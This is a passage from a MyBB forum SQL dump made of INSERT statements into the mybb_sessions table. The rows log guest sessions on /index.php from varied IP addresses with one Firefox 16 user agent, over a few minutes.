`useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('265fe99a5bbb1a0b34fc3d1fc6b398c0', '0', '7.18.183.36', '1352771029', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('10a911fd5fa3540a7f4f6e2e3f8441bc', '0', '81.137.118.236', '1352771033', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('91a33ed9d5f5dbcbc34e538779a06d6b', '0', '234.35.233.29', '1352771033', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('39057e7fa9cdbae3143832ffbd6a636d', '0', '40.199.182.201', '1352771035', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d756e576ea921bd639d9ecce0dc99210', '0', '176.101.251.154', '1352771035', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4adbba4d8b4208a25ec35eda29db6735', '0', '28.194.60.70', '1352771043', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5d4e8895e70e8434a3b6a55e38123fd9', '0', '181.13.181.191', '1352771036', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3e23fce437ca947ba2c5918c5376db42', '0', '158.232.21.179', '1352771037', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('95503f855a930bd6fa55953a43785e62', '0', '9.93.92.186', '1352771039', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('006e38428f454d5769adb7993a230195', '0', '21.99.32.121', '1352771039', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('862760dece1ee1d936271e97aa76348b', '0', '140.27.201.148', '1352771040', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e32cd3ed5c41fd0f8abb17036d4d70b2', '0', '84.10.224.75', '1352771042', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9bf78e552caf33b526069fe6d2da7cca', '0', '221.59.56.167', '1352771044', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8dc7947743b78cd7f5847f5b867cdf26', '0', '93.9.192.24', '1352771044', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4f4b5da507d30832c8147f96f750f721', '0', '79.166.244.224', '1352771045', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e3b841dded23c30cc0de56f02062bc5f', '0', '97.208.20.187', '1352771048', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('02db0e61c3b27a34a5aecf80067f07b9', '0', '9.29.41.65', '1352771053', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5cc7da8357966c7522aa4bfe3a5f9896', '0', '116.92.145.213', '1352771054', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8f41c6e32433fafbd8a8ef82df075857', '0', '123.233.231.222', '1352771055', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('baa6fea42712f8c19ecd2bee356280b9', '0', '103.1.130.196', '1352771056', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b0cee3fbce723ac567b47c7a698c145d', '0', '27.126.148.157', '1352771058', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8879aa31b3ee4d09876265a3c1ede0f0', '0', '186.230.228.125', '1352771059', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a39d24f08a717661fdc1d691ecb86106', '0', '147.146.224.117', '1352771059', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ab859567177ba291856f8b066dab58cd', '0', '253.21.209.164', '1352771060', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bea87773c13fd108795c414170aaa246', '0', '88.27.6.184', '1352771061', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('02711d70ffa390a2e57ec1c4c0cbea0c', '0', '176.138.105.26', '1352771063', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f052a1e1539b1200887134b4427fa46e', '0', '193.208.110.91', '1352771064', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('467b82476fd7e867a1f50a85d4153ef6', '0', '94.29.3.35', '1352771065', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8299fce35e9e7de0c11d4bf8455bf657', '0', '159.246.130.76', '1352771066', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8e21b78f26f22f32c02b83bdaf7b17fc', '0', '81.35.242.217', '1352771066', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c2f42a061ef316c724afccaf1dc919af', '0', '15.223.92.67', '1352771067', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d1c7faba2f34c859be5ee06b2caa328a', '0', '78.248.244.245', '1352771071', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cb33f75abb44f57970d12797b5c44037', '0', '125.248.224.210', '1352771074', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dc059b69b3cd1ac6bab3ad2fbd804a4a', '0', '168.142.68.105', '1352771075', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0b72849fc39ec860767df42e24a26292', '0', '197.209.53.92', '1352771076', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4c772bb19df3f6a8048edc528cca8f9d', '0', '112.20.148.168', '1352771077', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('700caf303e93f04a84565d590813e737', '0', '65.177.115.107', '1352771077', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f51c71b68608f332814f934e0566ea52', '0', '248.111.48.171', '1352771078', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('122c8c3ceb0595af36cc7b31f72df6f7', '0', '8.113.40.227', '1352771078', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7ec7b1e269c52710439775cf167914c6', '0', '41.184.122.63', '1352771080', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ef6844c314239aa16f98832a58761a12', '0', '47.58.63.91', '1352771081', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('327656daf0eba9f041735e92fed51442', '0', '167.29.66.51', '1352771081', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('08781632334ee38b9f006040623b4748', '0', '181.81.146.136', '1352771082', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('597ec8251e3fb9ac17d6b400626bc56e', '0', '92.131.163.222', '1352771083', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('124cbc47c97c3999d789a9b16f5e4910', '0', '209.194.129.11', '1352771084', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ba13519aa299cb1bf8fa5c3201251b54', '0', '106.196.17.226', '1352771092', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cfbae6a9039e2008ed63743274a01d92', '0', '184.57.226.46', '1352771094', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b6f42be9b516a2f6cef0a562c0d9aa57', '0', '126.93.70.70', '1352771095', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('00ffadce96e7a83b9fc91afaff06d8bf', '0', '228.40.15.233', '1352771096', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ca16487954631a5455b42f3f99b97428', '0', '174.47.224.128', '1352771097', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1a86fe418e7d0036df56283cec8d057b', '0', '105.160.103.28', '1352771097', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2319c357c724c635f6c0ee0697bea8bb', '0', '79.16.179.227', '1352771098', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('24443aacde26353594e6ee39fb0826f7', '0', '173.96.251.188', '1352771099', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('767860c47ebbb84d2c86285a3e9f911f', '0', '141.95.228.214', '1352771099', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1322f34523433a7625b9b585a66b50fc', '0', '62.202.132.88', '1352771100', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4370526954bd75557897dd21d0b93771', '0', '191.241.99.209', '1352771101', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('486cb49b681c960f124afc0527dee36c', '0', '250.71.40.104', '1352771102', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bee4ad2faae67ba6de8891c94e4d2fff', '0', '196.18.219.179', '1352771103', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6a7e037b375c26415988c460c37364b2', '0', '238.11.150.207', '1352771104', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('68b78d1087a3b1daa5a753f76cdf8481', '0', '223.136.112.38', '1352771105', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('14ed52f59dd9f6800b5d9c74f9842ffd', '0', '111.166.176.187', '1352771105', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9431788c34f71da67f453bf3d3f51ecb', '0', '107.168.99.215', '1352771106', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bb176aad79f0207c4bd604ff442bdc06', '0', '8.216.72.22', '1352771107', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('01ea13ce7823b310d019fd5882394b46', '0', '45.209.152.111', '1352771109', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('46c9ae0c121f718759f34b18cde3d16f', '0', '69.55.239.87', '1352771111', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('edf589e0ecc4e56b73046d578c5a0f2f', '0', '188.20.251.4', '1352771115', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9d12fa1bd4f85b24aa0d090cc49ff4cb', '0', '45.97.168.232', '1352771116', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cd4c9e38d8b2b3321ccc5be14f49c65e', '0', '95.66.53.0', '1352771117', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0bcde87668b3aa59cf711ade379924a6', '0', '128.212.177.16', '1352771119', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b996325d2760b7d6ebaf50ec7d7768b8', '0', '110.62.13.87', '1352771122', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0bef09bb942a04664bdd4f3ef7f7ad8a', '0', '103.99.102.122', '1352771122', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0d930fbe3e380958ddb92a6f1166660e', '0', '211.26.141.149', '1352771123', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('52bd2446df03ffda548d4e1afcd39141', '0', '176.50.89.137', '1352771125', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2caa2dad45cf75f1d69728084b889ea8', '0', '189.59.112.92', '1352771126', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f0fa232230123a27af5475874ba23d1f', '0', '18.208.11.56', '1352771127', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fef0efc6fdad8281eeee564707446a97', '0', '253.99.112.74', '1352771127', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('20fbf928d98cddfaf9a84f205520268b', '0', '51.127.213.61', '1352771128', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('af6099dce998b839903cdd2e81f8e209', '0', '74.79.35.51', '1352771129', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e548fc98ebcaa097b44099775d21fbdf', '0', '58.230.219.59', '1352771130', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5626a1f0b30aab329ef743d0a5b638df', '0', '111.58.226.155', '1352771131', 